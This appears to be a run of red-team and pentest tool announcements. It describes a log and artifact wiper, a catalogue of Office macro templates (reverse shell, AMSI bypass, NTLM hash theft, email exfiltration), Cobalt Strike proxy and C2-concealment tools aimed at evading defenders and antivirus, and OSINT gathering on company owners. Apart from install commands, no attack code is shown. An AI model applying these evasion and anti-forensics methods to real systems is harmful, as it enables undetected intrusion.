docker-compose up -d

User: blackstone

Password: blackstone

Manual Install

  • First we must download an Apache server to host the tool, in my case I use Mamp (I recommend following these steps): https://www.mamp.info/en/downloads/
  • We will download the content of this repository and we will have 2 folders (BlackStone and BBDD)
  • Once the server starts we will go to c://MAMP/htdocs and paste all the contents of the downloaded folder "BlackStone"
  • For the application to work we will have to import the database, we will go to our browser and write "localhost/phpMyAdmin/", you have the database connection file in the folder BlackStone/conexion.php
  • We will create a database called blackstone and import the data from the downloaded BBDD folder
  • Log in to BlackStone with the username and password "blackstone"

Use

First you need to go to profile settings and add Hunter.io and haveibeenpwned.com tokens:

Pentesting Reporting Tool (3)

After having vulnerabilities in the database, we will go to the audited client and we will register a client along with their web page, once registered we can go to customer details and we can see the following information:

THE USE OF THIS APPLICATION IS FOR PROFESSIONAL USE, THE AUTHOR IS NOT RESPONSIBLE FOR A MISUSE EMPLOYED

  • Name of business owner
  • Social networks of the company owner
  • Email and telephone number of the owner of the company
  • Exposed password check on the company owner's deep web
  • Subdomains of the website as well as information of interest found in google
  • Emails of company workers

Pentesting Reporting Tool (4)

Once we have the company that we are going to audit registered in the database, we will create a report, adding the date, name of the report and the company to which will be audited. When we register the report, we will give it edit and then we will select the vulnerabilities that we want to appear in the report:

Pentesting Reporting Tool (5)

Finally, we will generate the report by clicking on the "overview report" button, and later we will save the page that is generated as ".mht", then we will open it with Word to be able to work on the generated report:

Pentesting Reporting Tool (6)



Smap - A Drop-In Replacement For Nmap Powered By Shodan.Io

By: Zion3R
8 August 2022 at 12:30


Smap is a replica of Nmap which uses shodan.io's free API for port scanning. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.


Features

  • Scans 200 hosts per second
  • Doesn't require any account/api key
  • Vulnerability detection
  • Supports all nmap's output formats
  • Service and version fingerprinting
  • Makes no contact to the targets

Installation

Binaries

You can download a pre-built binary from here and use it right away.

Manual

go install -v github.com/s0md3v/smap/cmd/[email protected]

Confused or something not working? For more detailed instructions, click here

AUR pacakge

Smap is available on AUR as smap-git (builds from source) and smap-bin (pre-built binary).

Homebrew/Mac

Smap is also avaible on Homebrew.

brew update
brew install smap

Usage

Smap takes the same arguments as Nmap but options other than -p, -h, -o*, -iL are ignored. If you are unfamiliar with Nmap, here's how to use Smap.

Specifying targets

smap 127.0.0.1 127.0.0.2

You can also use a list of targets, seperated by newlines.

smap -iL targets.txt

Supported formats

1.1.1.1         // IPv4 address
example.com // hostname
178.23.56.0/8 // CIDR

Output

Smap supports 6 output formats which can be used with the -o* as follows

smap example.com -oX output.xml

If you want to print the output to terminal, use hyphen (-) as filename.

Supported formats

oX    // nmap's xml format
oG // nmap's greppable format
oN // nmap's default format
oA // output in all 3 formats above at once
oP // IP:PORT pairs seperated by newlines
oS // custom smap format
oJ // json

Note: Since Nmap doesn't scan/display vulnerabilities and tags, that data is not available in nmap's formats. Use -oS to view that info.

Specifying ports

Smap scans these 1237 ports by default. If you want to display results for certain ports, use the -p option.

smap -p21-30,80,443 -iL targets.txt

Considerations

Since Smap simply fetches existent port data from shodan.io, it is super fast but there's more to it. You should use Smap if:

You want

  • vulnerability detection
  • a super fast port scanner
  • results for most common ports (top 1237)
  • no connections to be made to the targets

You are okay with

  • not being able to scan IPv6 addresses
  • results being up to 7 days old
  • a few false negatives


MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution

By: Zion3R
9 August 2022 at 12:30


MrKaplan is a tool aimed to help red teamers to stay hidden by clearing evidence of execution. It works by saving information such as the time it ran, snapshot of files and associate each evidence to the related user.

This tool is inspired by MoonWalk, a similar tool for Unix machines.

You can read more about it in the wiki page.


Features

  • Stopping event logging.
  • Clearing files artifacts.
  • Clearing registry artifacts.
  • Can run for multiple users.
  • Can run as user and as admin (Highly recommended to run as admin).
  • Can save timestamps of files.
  • Can exclude certian operations and leave artifacts to blue teams.

Usage

  • Before you start your operations on the computer, run MrKaplan with begin flag and whenever your finish run it again with end flag.
  • DO NOT REMOVE MrKaplan registry key, otherwise MrKaplan will not be able to use the information.

IOCs

  • Powershell process that access to the artifacts mentioned in the wiki page.

  • Powershell importing weird base64 blob.

  • Powershell process that performs Token Manipulation.

  • MrKaplan's registry key: HKCU:\Software\MrKaplan.

Acknowledgements

Disclaimer

I'm not responsible in any way for any kind of damage that is done to your computer / program as cause of this project. I'm happily accept contribution, make a pull request and I will review it!



Packj - Large-Scale Security Analysis Platform To Detect Malicious/Risky Open-Source Packages

By: Zion3R
10 August 2022 at 12:30


Packj (pronounced package) is a command line (CLI) tool to vet open-source software packages for "risky" attributes that make them vulnerable to supply chain attacks. This is the tool behind our large-scale security analysis platform Packj.dev that continuously vets packages and provides free reports.


How to use

Packj accepts two input args:

  • name of the registry or package manager, pypi, npm, or rubygems.
  • name of the package to be vetted

Packj supports vetting of PyPI, NPM, and RubyGems packages. It performs static code analysis and checks for several metadata attributes such as release timestamps, author email, downloads, dependencies. Packages with expired email domains, large release time gap, sensitive APIs, etc. are flagged as risky for security reasons.

Packj also analyzes public repo code as well as metadata (e.g., stars, forks). By comparing the repo description and package title, you can be sure if the package indeed has been created from the repo to mitigate any starjacking attacks.

Containerized

The best way to use Packj is to run it inside Docker (or Podman) container. You can pull our latest image from DockerHub to get started.

docker pull ossillate/packj:latest

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest npm browserify
[+] Fetching 'browserify' from npm...OK [ver 17.0.0]
[+] Checking version...ALERT [598 days old]
[+] Checking release history...OK [484 version(s)]
[+] Checking release time gap...OK [68 days since last release]
[+] Checking author...OK [[email protected]]
[+] Checking email/domain validity...ALERT [expired author email domain]
[+] Checking readme...OK [26838 bytes]
[+] Checking homepage...OK [https://github.com/browserify/browserify#readme]
[+] Checking downloads...OK [2.2M weekly]
[+] Checking repo_url URL...OK [https://github.com/browserify/browserify]
[+] Checking repo data...OK [stars: 14077, forks: 1236]
[+] Checking repo activity...OK [commits: 2290, contributors: 207, tags: 413]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [48 found]
[+] Downloading package 'browserify' (ver 17. 0.0) from npm...OK [163.83 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,file,codegen]
[+] Checking files/funcs...OK [429 files (383 .js), 744 funcs, LoC: 9.7K]
=============================================
[+] 5 risk(s) found, package is undesirable!
=> Complete report: /tmp/npm-browserify-17.0.0.json
{
"undesirable": [
"old package: 598 days old",
"invalid or no author email: expired author email domain",
"generates new code at runtime",
"reads files and dirs",
"forks or exits OS processes",
]
}

Specific package versions to be vetted could be specified using ==. Please refer to the example below

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest pypi requests==2.18.4
[+] Fetching 'requests' from pypi...OK [ver 2.18.4]
[+] Checking version...ALERT [1750 days old]
[+] Checking release history...OK [142 version(s)]
[+] Checking release time gap...OK [14 days since last release]
[+] Checking author...OK [[email protected]]
[+] Checking email/domain validity...OK [[email protected]]
[+] Checking readme...OK [49006 bytes]
[+] Checking homepage...OK [http://python-requests.org]
[+] Checking downloads...OK [50M weekly]
[+] Checking repo_url URL...OK [https://github.com/psf/requests]
[+] Checking repo data...OK [stars: 47547, forks: 8758]
[+] Checking repo activity...OK [commits: 6112, contributors: 725, tags: 144]
[+] Checking for CVEs...ALERT [2 found]
[+] Checking dependencies...OK [9 direct]
[+] Downloading package 'requests' (ver 2.18.4) from pypi...OK [123.27 KB]
[+ ] Analyzing code...ALERT [needs 4 perms: codegen,process,file,network]
[+] Checking files/funcs...OK [47 files (33 .py), 578 funcs, LoC: 13.9K]
=============================================
[+] 6 risk(s) found, package is undesirable, vulnerable!
{
"undesirable": [
"old package: 1744 days old",
"invalid or no homepage: insecure webpage",
"generates new code at runtime",
"fetches data over the network",
"reads files and dirs",
],
"vulnerable": [
"contains CVE-2018-18074,CVE-2018-18074"
]
}
=> Complete report: /tmp/pypi-requests-2.18.4.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/requests/2.18.4

Non-containerized

Alternatively, you can install Python/Ruby dependencies locally and test it.

NOTE

  • Packj has only been tested on Linux.
  • Requires Python3 and Ruby. API analysis will fail if used with Python2.
  • You will have to install Python and Ruby dependencies before using the tool:
    • pip install -r requirements.txt
    • gem install google-protobuf:3.21.2 rubocop:1.31.1
$ python3 main.py npm eslint
[+] Fetching 'eslint' from npm...OK [ver 8.16.0]
[+] Checking version...OK [10 days old]
[+] Checking release history...OK [305 version(s)]
[+] Checking release time gap...OK [15 days since last release]
[+] Checking author...OK [[email protected]]
[+] Checking email/domain validity...OK [[email protected]]
[+] Checking readme...OK [18234 bytes]
[+] Checking homepage...OK [https://eslint.org]
[+] Checking downloads...OK [23.8M weekly]
[+] Checking repo_url URL...OK [https://github.com/eslint/eslint]
[+] Checking repo data...OK [stars: 20669, forks: 3689]
[+] Checking repo activity...OK [commits: 8447, contributors: 1013, tags: 302]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [35 found]
[+] Downloading package 'eslint' (ver 8.16.0) from npm...OK [490.14 KB]
[+] Analyzing code...ALERT [needs 2 perms: codegen,file]
[+ ] Checking files/funcs...OK [395 files (390 .js), 1022 funcs, LoC: 76.3K]
=============================================
[+] 2 risk(s) found, package is undesirable!
{
"undesirable": [
"generates new code at runtime",
"reads files and dirs: ['package/lib/cli-engine/load-rules.js:37', 'package/lib/cli-engine/file-enumerator.js:142']"
]
}
=> Complete report: /tmp/npm-eslint-8.16.0.json

How it works

  • It first downloads the metadata from the registry using their APIs and analyze it for "risky" attributes.
  • To perform API analysis, the package is downloaded from the registry using their APIs into a temp dir. Then, packj performs static code analysis to detect API usage. API analysis is based on MalOSS, a research project from our group at Georgia Tech.
  • Vulnerabilities (CVEs) are checked by pulling info from OSV database at OSV
  • Python PyPI and NPM package downloads are fetched from pypistats and npmjs
  • All risks detected are aggregated and reported

Risky attributes

The design of Packj is guided by our study of 651 malware samples of documented open-source software supply chain attacks. Specifically, we have empirically identified a number of risky code and metadata attributes that make a package vulnerable to supply chain attacks.

For instance, we flag inactive or unmaintained packages that no longer receive security fixes. Inspired by Android app runtime permissions, Packj uses a permission-based security model to offer control and code transparency to developers. Packages that invoke sensitive operating system functionality such as file accesses and remote network communication are flagged as risky as this functionality could leak sensitive data.

Some of the attributes we vet for, include

Attribute Type Description Reason
Release date Metadata Version release date to flag old or abandonded packages Old or unmaintained packages do not receive security fixes
OS or lang APIs Code Use of sensitive APIs, such as exec and eval Malware uses APIs from the operating system or language runtime to perform sensitive operations (e.g., read SSH keys)
Contributors' email Metadata Email addresses of the contributors Incorrect or invalid of email addresses suggest lack of 2FA
Source repo Metadata Presence and validity of public source repo Absence of a public repo means no easy way to audit or review the source code publicly

Full list of the attributes we track can be viewed at threats.csv

These attributes have been identified as risky by several other researchers [1, 2, 3] as well.

How to customize

Packj has been developed with a goal to assist developers in identifying and reviewing potential supply chain risks in packages.

However, since the degree of perceived security risk from an untrusted package depends on the specific security requirements, Packj can be customized according to your threat model. For instance, a package with no 2FA may be perceived to pose greater security risks to some developers, compared to others who may be more willing to use such packages for the functionality offered. Given the volatile nature of the problem, providing customized and granular risk measurement is one of our goals.

Packj can be customized to minimize noise and reduce alert fatigue by simply commenting out unwanted attributes in threats.csv

Malware found

We found over 40 malicious packages on PyPI using this tool. A number of them been taken down. Refer to an example below:

$ python3 main.py pypi krisqian
[+] Fetching 'krisqian' from pypi...OK [ver 0.0.7]
[+] Checking version...OK [256 days old]
[+] Checking release history...OK [7 version(s)]
[+] Checking release time gap...OK [1 days since last release]
[+] Checking author...OK [[email protected]]
[+] Checking email/domain validity...OK [[email protected]]
[+] Checking readme...ALERT [no readme]
[+] Checking homepage...OK [https://www.bilibili.com/bangumi/media/md140632]
[+] Checking downloads...OK [13 weekly]
[+] Checking repo_url URL...OK [None]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...OK [none found]
[+] Downloading package 'KrisQian' (ver 0.0.7) from pypi...OK [1.94 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,network,file]
[+] Checking files/funcs...OK [9 files (2 .py), 6 funcs, LoC: 184]
=============================================
[+] 6 risk(s) found, package is undes irable!
{
"undesirable": [
"no readme",
"only 45 weekly downloads",
"no source repo found",
"generates new code at runtime",
"fetches data over the network: ['KrisQian-0.0.7/setup.py:40', 'KrisQian-0.0.7/setup.py:50']",
"reads files and dirs: ['KrisQian-0.0.7/setup.py:59', 'KrisQian-0.0.7/setup.py:70']"
]
}
=> Complete report: pypi-KrisQian-0.0.7.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/KrisQian/0.0.7

Packj flagged KrisQian (v0.0.7) as suspicious due to absence of source repo and use of sensitive APIs (network, code generation) during package installation time (in setup.py). We decided to take a deeper look, and found the package malicious. Please find our detailed analysis at https://packj.dev/malware/krisqian.

More examples of malware we found are listed at https://packj.dev/malware Please reach out to us at [email protected] for full list.

Resources

To learn more about Packj tool or open-source software supply chain attacks, refer to our

The vetting tool <g-emoji alias=rocket class=g-emoji fallback-src=https://github.githubassets.com/images/icons/emoji/unicode/1f680.png>&#128640;</g-emoji> behind our large-scale security analysis platform to detect malicious/risky open-source packages (7)

Upcoming talks

Feature roadmap

  • Add support for other language ecosystems. Rust is a work in progress, and will be available in July '22 (last week).
  • Add functionality to detect several other "risky" code as well as metadata attributes.
  • Packj currently only performs static code analysis, we are working on adding support for dynamic analysis (WIP, ETA: end of summer)

Team

Packj has been developed by Cybersecurity researchers at Ossillate Inc. and external collaborators to help developers mitigate risks of supply chain attacks when sourcing untrusted third-party open-source software dependencies. We thank our developers and collaborators.

We welcome code contributions. Join our discord community for discussion and feature requests.

FAQ

  • What Package Managers (Registries) are supported?

Packj can currently vet NPM, PyPI, and RubyGems packages for "risky" attributes. We are adding support for Rust.

  • Does it work on obfuscated calls? For example, a base 64 encrypted string that gets decrypted and then passed to a shell?

This is a very common malicious behavior. Packj detects code obfuscation as well as spawning of shell commands (exec system call). For example, Packj can flag use of getattr() and eval() API as they indicate "runtime code generation"; a developer can go and take a deeper look then. See main.py for details.

  • Does this work at the system call level, where it would detect e.g. any attempt to open ~/.aws/credentials, or does it rely on heuristic analysis of the code itself, which will always be able to be "coded around" by the malware authors?

Packj currently uses static code analysis to derive permissions (e.g., file/network accesses). Therefore, it can detect open() calls if used by the malware directly (e.g., not obfuscated in a base64 encoded string). But, Packj can also point out such base64 decode calls. Fortunately, malware has to use these APIs (read, open, decode, eval, etc.) for their functionality -- there's no getting around. Having said that, a sophisticated malware can hide itself better, so dynamic analysis must be performed for completeness. We are incorporating strace-based dynamic analysis (containerized) to collect system calls. See roadmap for details.



Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R
11 August 2022 at 06:08

Time for another Kali Linux release! โ€“ Kali Linux 2022.3. This release has various impressive updates.

The highlights for Kaliโ€™s 2022.3โ€™s release:

For more details, see the bug tracker changelog.


More info here.


Faraday Community - Open Source Penetration Testing and Vulnerability Management Platform

By: Zion3R
11 August 2022 at 12:30


Faraday was built from within the security community, to make vulnerability management easier and enhance our work. What IDEs are to programming, Faraday is to pentesting.

Offensive security had two difficult tasks: designing smart ways of getting new information, and keeping track of findings to improve further work.

This new update brings: New scanning, reporting and UI experience


Focus on pentesting

Get your work organized and focus on what you do best. With Faradaycommunity, you may focus on pentesting while we help you with the rest..

Check out the documentation here.

Installation

The easiest way to get faraday up and running is using our docker-compose

# Docker-compose

$ wget https://raw.githubusercontent.com/infobyte/faraday/master/docker-compose.yaml

$ docker-compose up

Manage your findings

Manage, classify and triage your results through Faradayโ€™s dashboard, designed with and for pentesters.

Get an overview of your vulnerabilities and ease your work.




By right clicking on any vulnerability, you may filter, tag and classify your results with ease. You may also add comments to vulnerabilities and add evidence with just a few clicks



In the asset tab, information on each asset is presented, for a detailed follow-up on every device in your network. This insight might be especially useful if you hold critical data on certain assets, so the impact of vulnerabilities may be assessed through this information. If responsibilities over each asset are clear, this view helps to organize and follow the work of asset owners too.

Here, you can obtain information about the OS, services, ports and vulnerabilities associated with each of your assets, which will give you a better understanding of your scope and help you to gain an overview of what you are assessing.




Use your favorite tools

Integrate scanners with Faraday Agents Dispatcher. This feature will allow you to orchestrate the most common used security tools and have averything available from your Faraday instance. Once your scan is finished, you will be able to see all the results in the main dashboard.


Choose the scanners that best fit your needs.



Share your results

Once youโ€™re done, export your results in a CSV format.

Check out some of our features

Full centralization

With Faraday, you may oversee your cybersecurity efforts, prioritize actions and manage your resources from a single platform.

Elegant integration of scanning tools

Make sense of todayโ€™s overwhelming number of tools. Faradayโ€™s technology aligns +80 key plugins with your current needs, normalizing and deduplicating vulnerabilities.

Powerful Automation

Save time by automating pivotal steps of Vulnerability Management. Scan, create reports, and schedule pipelines of custom actions, all following your requirements.

Intuitive dashboard

Faradayโ€™s intuitive dashboard guides teams through vulnerability management with ease. Scan, analyze, automate, tag, and prioritize, each with just a few clicks.

Smart visibility

Get full visibility of your security posture in real-time. Advanced filters, navigation, and analytics help you strategize and focus your work.

Easier teamwork

Coordinate efforts by sending tickets to Jira, Gitlab, and ServiceNow directly from Faraday.

Planning ahead

Manage your security team with Faraday planner. Keep up by communicating with your peers and receiving notifications.

Work as usual, but better

Get your work organized on the run when pentesting with Faraday CLI.

Proudly Open Source

We believe in the power of teams, most of our integrations and core technologies are open source, allowing any team to build custom implementations and integrations.

For more information check out our website www.faradaysec.com


OffensiveVBA - Code Execution And AV Evasion Methods For Macros In Office Documents

By: Zion3R
12 August 2022 at 12:30


In preparation for a VBS AV Evasion Stream/Video I was doing some research for Office Macro code execution methods and evasion techniques.

The list got longer and longer and I found no central place for offensive VBA templates - so this repo can be used for such. It is very far away from being complete. If you know any other cool technique or useful template feel free to contribute and create a pull request!

Most of the templates in this repo were already published somewhere. I just copy pasted most templates from ms-docs sites, blog posts or from other tools.


Templates in this repo

File Description
ShellApplication_ShellExecute.vba Execute an OS command via ShellApplication object and ShellExecute method
ShellApplication_ShellExecute_privileged.vba Execute an privileged OS command via ShellApplication object and ShellExecute method - UAC prompt
Shellcode_CreateThread.vba Execute shellcode in the current process via Win32 CreateThread
Shellcode_EnumChildWindowsCallback.vba Execute shellcode in the current process via EnumChildWindows
Win32_CreateProcess.vba Create a new process for code execution via Win32 CreateProcess function
Win32_ShellExecute.vba Create a new process for code execution via Win32 ShellExecute function
WMI_Process_Create.vba Create a new process via WMI for code execution
WMI_Process_Create2.vba Another WMI code execution example
WscriptShell_Exec.vba Execute an OS command via WscriptShell object and Exec method
WscriptShell_run.vba Execute an OS command via WscriptShell object and Run method
VBA-RunPE @itm4n's RunPE technique in VBA
GadgetToJScript med0x2e's C# script for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.
PPID_Spoof.vba christophetd's spoofing-office-macro copy
AMSIBypass_AmsiScanBuffer_ordinal.vba rmdavy's AMSI Bypass to patch AmsiScanBuffer using ordinal values for a signature bypass
AMSIBypass_AmsiScanBuffer_Classic.vba rasta-mouse's classic AmsiScanBuffer patch
AMSIBypass_Heap.vba rmdavy's HeapsOfFun repo copy
AMSIbypasses.vba outflanknl's AMSI bypass blog
COMHijack_DLL_Load.vba Load DLL via COM Hijacking
COM_Process_create.vba Create process via COM object
Download_Autostart.vba Download a file from a remote webserver and put it into the StartUp folder
Download_Autostart_WinAPI.vba Download a file from a remote webserver via URLDownloadtoFileA and put it into the StartUp folder
Dropper_Autostart.vba Drop batch file into the StartUp folder
Registry_Persist_wmi.vba Create StartUp registry key for persistence via WMI
Registry_Persist_wscript.vba Create StartUp registry key for persistence via wscript object
ScheduledTask_Create.vba Create and start sheduled task for code execution/persistence
XMLDOM_Load_XSL_Process_create.vba Load XSL from a remote webserver to execute code
regsvr32_sct_DownloadExecute.vba Execute regsvr32 to download a remote webservers SCT file for code execution
BlockETW.vba Patch EtwEventWrite in ntdll.dll to block ETW data collection
BlockETW_COMPLUS_ETWEnabled_ENV.vba Block ETW data collection by setting the environment variable COMPLUS_ETWEnabled to 0, credit to @xpn
ShellWindows_Process_create.vba ShellWindows Process create to get explorer.exe as parent process
AES.vba An example to use AES encryption/decryption in VBA from Here
Dropper_Executable_Autostart.vba Get executable bytes from VBA and drop into Autostart - no download in this case
MarauderDrop.vba Drop a COM registered .NET DLL into temp, import the function and execute code - in this case loads a remote C# binary from a webserver to memory and executes it - credit to @Jean_Maes_1994 for MaraudersMap
Dropper_Workfolders_lolbas_Execute.vba Drop an embedded executable into the TEMP directory and execute it using C:\windows\system32\Workfolders.exe as LOLBAS - credit to @YoSignals
SandBoxEvasion Some SandBox Evasion templates
Evasion Dropper Autostart.vba Drops a file to the Startup directory bypassing file write monitoring via renamed folder operation
Evasion MsiInstallProduct.vba Installs a remote MSI package using WindowsInstaller ActiveXObject avoiding spawning suspicious office child process, the msi installation will be executed as a child of the MSIEXEC /V service
StealNetNTLMv2.vba Steal NetNTLMv2 Hash via share connection - credit to https://book.hacktricks.xyz/windows/ntlm/places-to-steal-ntlm-creds
Parse-Outlook.vba Parses Outlook for sensitive keywords and file extensions, and exfils them via email - credit to JohnWoodman
Reverse-Shell.vba Reverse shell written entirely in VBA using Windows API calls - credit to JohnWoodman

Missing - ToDos

File Description
Unhooker.vba Unhook API's in memory to get rid of hooks
Syscalls.vba Syscall usage - fresh from disk or Syswhispers like
Manymore.vba If you have any more ideas feel free to contribute

Obfuscators / Payload generators

  1. VBad
  2. wePWNise
  3. VisualBasicObfuscator - needs some modification as it doesn't split up lines and is therefore not usable for office document macros
  4. macro_pack
  5. shellcode2vbscript.py
  6. EvilClippy
  7. OfficePurge
  8. SharpShooter
  9. VBS-Obfuscator-in-Python - - needs some modification as it doesn't split up lines and is therefore not usable for office document macros

Credits / usefull resources

ASR bypass: http://blog.sevagas.com/IMG/pdf/bypass_windows_defender_attack_surface_reduction.pdf

Shellcode to VBScript conversion: https://github.com/DidierStevens/DidierStevensSuite/blob/master/shellcode2vbscript.py

Bypass AMSI in VBA: https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/

VBA purging: https://www.mandiant.com/resources/purgalicious-vba-macro-obfuscation-with-vba-purging

F-Secure VBA Evasion and detection post: https://blog.f-secure.com/dechaining-macros-and-evading-edr/

One more F-Secure blog: https://labs.f-secure.com/archive/dll-tricks-with-vba-to-improve-offensive-macro-capability/



NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy

By: Zion3R
13 August 2022 at 12:30


Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.


The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included in the file and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



Chisel-Strike - A .NET XOR Encrypted Cobalt Strike Aggressor Implementation For Chisel To Utilize Faster Proxy And Advanced Socks5 Capabilities

By: Zion3R
14 August 2022 at 12:30


A .NET XOR encrypted cobalt strike aggressor implementation for chisel to utilize faster proxy and advanced socks5 capabilities.


Why write this?

In my experience I found socks4/socks4a proxies quite slow in comparison to its socks5 counterparts and a lack of implementation of socks5 in most C2 frameworks. There is a C# wrapper around the go version of chisel called SharpChisel. This wrapper has a few issues and isn't maintained to the latest version of chisel. It didnโ€™t allow using shellcode with donut, reflectio n methods or execute-assembly. I found a fix for this using the SharpChisel-NG project.

Since the SharpChisel assembly is around 16.7 MB, execute-assembly(has a hidden size limitation of 1 MB) and similar in memory methods wouldnโ€™t work. To maintain most of the execution in memory I incorporated the NetLoader project by Flangvik which is executed via execute-assembly to reflectively host and load a XOR encrypted version of SharpChisel with base64 arguments in memory.

As an alternative, it is also possible to implement similar C# proxies like SharpSocks by replacing the appropriate chisel binaries in the project.

Setup

Note: If using a Windows teamserver skip steps 2 and 3.

  1. Clone/download the repository: git clone https://github.com/m3rcer/Chisel-Strike.git

  2. Make all binaries executable:

  • cd Chisel-Strike

  • chmod +x -R chisel-modules

  • chmod +x -R tools

  1. Install Mingw-w64 and mono:
  • sudo apt-get install mingw-w64

  • sudo apt install mono-complete

  1. Import ChiselStrike.cna in cobalt strike using the Script Manager

Recompile binaries from the src folder if needed.

Usage

chisel can be executed on both the teamserver (windows/linux) and the beacon. With either acting as the server/client. A normal execution flow would be to setup a chisel server on the teamserver and create a client on the beacon connecting back to the teamserver.

Commands

  1. chisel <client/server> <command>: Run Chisel on a beacon

  2. chisel-tms <client/server> <command>: Run Chisel on your teamserver

  3. chisel-enc: XOR Encrypt SharpChisel.exe with a password of choice

  4. chisel-jobs: List active chisel jobs on the teamserver and beacon

  5. chisel-kill: Kill active chisel jobs on a beacon

  6. chisel-tms-kill: Kill active chisel jobs on teamserver

Example

OPSEC

NetLoader can easily be obfuscated and used to bypass defender using projects like NimCrypt2 and the like.

Yet SharpChisel.exe drops a dll on disk due to the use of Costura/Fody packages at a location similar to: C:\Users\m3rcer\AppData\Local\Temp\Costura\CB9433C24E75EC539BF34CD1AA12B236\64\main.dll which is detected by defender. It is advised to obfuscate chisel dll's using projects like gobfuscate in the SharpChisel-NG project and re-build new SharpChisel-NG binaries as shown here.

TODO

  • Figure a way to avoid SharpChisel dropping main.dll on disk / Create a new C# wrapper for chisel.

  • Create a method to parse command output for the chisel-tms command.

Credits



RedGuard - C2 Front Flow Control Tool, Can Avoid Blue Teams, AVs, EDRs Check

By: Zion3R
15 August 2022 at 12:30


0x00 Introduction

Tool introduction

RedGuard is a derivative work of the C2 facility pre-flow control technology. It has a lighter design, efficient flow interaction, and reliable compatibility with go language development. The core problem it solves is also in the face of increasingly complex red and blue attack and defense drills, giving the attack team a better C2 infrastructure concealment scheme, giving the interactive traffic of the C2 facility a flow control function, and intercepting those "malicious" analysis traffic, and better complete the entire attack mission.

RedGuard is a C2 facility pre-flow control tool that can avoid Blue Team, AVS, EDR, Cyberspace Search Engine checks.


Application scenarios

  • During the offensive and defensive drills, the defender analyzes and traces the source of C2 interaction traffic according to the situational awareness platform
  • Identify and prevent malicious analysis of Trojan samples in cloud sandbox environment based on JA3 fingerprint library
  • Block malicious requests to implement replay attacks and achieve the effect of confusing online
  • In the case of specifying the IP of the online server, the request to access the interactive traffic is restricted by means of a whitelist
  • Prevent the scanning and identification of C2 facilities by cyberspace mapping technology, and redirect or intercept the traffic of scanning probes
  • Supports pre-flow control for multiple C2 servers, and can achieve the effect of domain front-end, load balancing online, and achieve the effect of concealment
  • Able to perform regional host online restriction according to the attribution of IP address by requesting IP reverse lookup API interface
  • Resolve strong features of staged checksum8 rule path parsing without changing the source code.
  • Analyze blue team tracing behavior through interception logs of target requests, which can be used to track peer connection events/issues
  • It has the function of customizing the time period for the legal interaction of the sample to realize the function of only conducting traffic interaction during the working time period
  • Malleable C2 Profile parser capable of validating inbound HTTP/S requests strictly against malleable profile and dropping outgoing packets in case of violation (supports Malleable Profiles 4.0+)
  • Built-in blacklist of IPV4 addresses for a large number of devices, honeypots, and cloud sandboxes associated with security vendors to automatically intercept redirection request traffic
  • SSL certificate information and redirect URLs that can interact with samples through custom tools to circumvent the fixed characteristics of tool traffic
  • ..........

0x01 Install

You can directly download and use the compiled version, or you can download the go package remotely for independent compilation and execution.

git clone https://github.com/wikiZ/RedGuard.git
cd RedGuard
# You can also use upx to compress the compiled file size
go build -ldflags "-s -w" -trimpath
# Give the tool executable permission and perform initialization operations
chmod +x ./RedGuard&&./RedGuard

0x02 Configuration Description

initialization

As shown in the figure below, first grant executable permissions to RedGuard and perform initialization operations. The first run will generate a configuration file in the current user directory to achieve flexible function configuration. Configuration file name: .RedGuard_CobaltStrike.ini.


Configuration file content:


The configuration options of cert are mainly for the configuration information of the HTTPS traffic exchange certificate between the sample and the C2 front-end facility. The proxy is mainly used to configure the control options in the reverse proxy traffic. The specific use will be explained in detail below.

The SSL certificate used in the traffic interaction will be generated in the cert-rsa/ directory under the directory where RedGuard is executed. You can start and stop the basic functions of the tool by modifying the configuration file (the serial number of the certificate is generated according to the timestamp , don't worry about being associated with this feature).If you want to use your own certificate,Just rename them to ca.crt and ca.key.

openssl x509 -in ca.crt -noout -text


Random TLS JARM fingerprints are updated each time RedGuard is started to prevent this from being used to authenticate C2 facilities.


In the case of using your own certificate, modify the HasCert parameter in the configuration file to true to prevent normal communication problems caused by the incompatibility of the CipherSuites encryption suite with the custom certificate caused by the randomization of JARM confusion.

# Whether to use the certificate you have applied for true/false
HasCert = false

RedGuard Usage

[email protected]:~# ./RedGuard -h

Usage of ./RedGuard:
-DropAction string
RedGuard interception action (default "redirect")
-EdgeHost string
Set Edge Host Communication Domain (default "*")
-EdgeTarget string
Set Edge Host Proxy Target (default "*")
-HasCert string
Whether to use the certificate you have applied for (default "true")
-allowIP string
Proxy Requests Allow IP (default "*")
-allowLocation string
Proxy Requests Allow Location (default "*")
-allowTime string
Proxy Requests Allow Time (default "*")
-common string
Cert CommonName (default "*.aliyun.com")
-config string
Set Config Path
-country string
Cert Country (default "CN")
-dns string
Cert DNSName
-host string
Set Proxy HostTarget
-http string
Set Proxy HTTP Port ( default ":80")
-https string
Set Proxy HTTPS Port (default ":443")
-ip string
IPLookUP IP
-locality string
Cert Locality (default "HangZhou")
-location string
IPLookUP Location (default "้ฃŽ่ตท")
-malleable string
Set Proxy Requests Filter Malleable File (default "*")
-organization string
Cert Organization (default "Alibaba (China) Technology Co., Ltd.")
-redirect string
Proxy redirect URL (default "https://360.net")
-type string
C2 Server Type (default "CobaltStrike")
-u Enable configuration file modification

**P.S. You can use the parameter command to modify the configuration file. Of course, I think it may be more convenient to modify it manually with vim. **

0x03 Tool usage

basic interception

